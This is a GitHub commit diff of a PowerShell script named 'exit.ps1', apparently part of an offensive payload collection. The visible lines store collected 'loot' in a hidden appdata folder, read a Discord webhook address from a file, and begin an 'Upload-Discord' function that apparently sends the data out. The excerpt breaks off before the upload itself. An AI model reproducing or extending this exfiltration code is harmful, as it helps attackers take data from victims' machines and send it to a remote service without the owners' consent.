Update exit.ps1

This commit is contained in:
I-Am-Jakoby
2022-12-26 22:49:34 -06:00
committed by GitHub
parent c3b01dfc48
commit d42311b22c
+2
View File
@@ -3,6 +3,8 @@ Add-Type -AssemblyName PresentationCore,PresentationFramework
$Path="$env:appdata\-locker\$env:UserName-loot.txt"
$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1)
function Upload-Discord {
[CmdletBinding()]